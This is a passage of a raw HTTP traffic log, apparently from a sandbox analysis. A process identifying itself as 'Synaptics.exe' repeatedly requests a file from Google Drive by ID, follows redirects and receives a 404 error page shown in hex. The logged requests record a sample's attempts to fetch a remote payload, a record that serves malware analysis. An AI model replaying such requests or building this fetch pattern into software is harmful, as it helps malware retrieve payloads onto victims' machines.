Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:33 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-07-02 04:51:33 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:33 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-dMGIoqYaXRZ-vsEYGECKlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:34 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-07-02 04:51:34 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:34 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-NWRc7CriPz1j575mit-fpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:35 UTC	332	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=515=hvNqLQGGTW_jz-Z-2Gifs1ZmMOcy9V7YwuCTkJ9UsaPlvIDjrgJvd-weTfYLZ6plN_u27mHeGvvWsNasfuhssEgcVrwaGUfDL1rg6SbcVNO2Nw5L9UyXxHRiiCXTd3QV4aREWJhGdvGnJQwd-rryP0B_x1r3oXK265LQum1pmfM
2024-07-02 04:51:35 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:35 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-V0ZiFNzhI389OfHhSy6fzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:36 UTC	332	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=515=hvNqLQGGTW_jz-Z-2Gifs1ZmMOcy9V7YwuCTkJ9UsaPlvIDjrgJvd-weTfYLZ6plN_u27mHeGvvWsNasfuhssEgcVrwaGUfDL1rg6SbcVNO2Nw5L9UyXxHRiiCXTd3QV4aREWJhGdvGnJQwd-rryP0B_x1r3oXK265LQum1pmfM
2024-07-02 04:51:36 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:36 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-IjQHWRcIs8B4pQaNi1KTJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:37 UTC	332	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=515=IbPQbmkO8S1c__kDzWy2niX9im8MAVnJ0ifr197baqmYgMBHx1Gdq7YI3NNXycd3ge8Qf-Mkbwlt27bx5bRdhUEvWlqwVraURIaL3FIv8h2ePtmkvqEjd_HFpPJYvCrj-dzSXhJdnl_4WxISiCzdyaSwhb0j4OcPgFDXebu_nlw
2024-07-02 04:51:37 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:37 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-oy36lZugIgc7tO608Qw5gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:37 UTC	375	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=515=o4szNmhRxdEOpFNobS4rMMbmu-3EivKfgD6Q5al0DAW64LhUikGaJlMI-cBm7mLNXwkxPvbBZ-Ia6dvia8iuaYEoPaezX_sHVk5jDetH_LWMtVG34SM7KNzlV54GIajonBPBWzetB_m_DRq14rcIWPdoZKfiq8MFkIXaYmOJRGs
2024-07-02 04:51:38 UTC	1246	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:38 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-KUYoDuJNS0F3Y8xM7eMdDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1642 X-GUploader-UploadID: ACJd0NrD3jAHuAPqJTrQALYZMSg6-PhMFVCeR3ciIqJDdd2ZXXkJs87Yhq0hgc_af3J0DP0xqPo Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-07-02 04:51:38 UTC	144	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: <html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found
2024-07-02 04:51:38 UTC	1390	IN	Data Raw: 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 61 33 66 5f 62 72 35 6b 6e 77 30 33 70 63 6a 30 58 2d 66 6a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 Data Ascii: )!!1</title><style nonce="ha3f_br5knw03pcj0X-fjw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0
2024-07-02 04:51:38 UTC	108	IN	Data Raw: 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: s an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:39 UTC	332	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=515=IbPQbmkO8S1c__kDzWy2niX9im8MAVnJ0ifr197baqmYgMBHx1Gdq7YI3NNXycd3ge8Qf-Mkbwlt27bx5bRdhUEvWlqwVraURIaL3FIv8h2ePtmkvqEjd_HFpPJYvCrj-dzSXhJdnl_4WxISiCzdyaSwhb0j4OcPgFDXebu_nlw
2024-07-02 04:51:39 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:39 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-H3Q9mwHx55WNV9FRqY_h3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close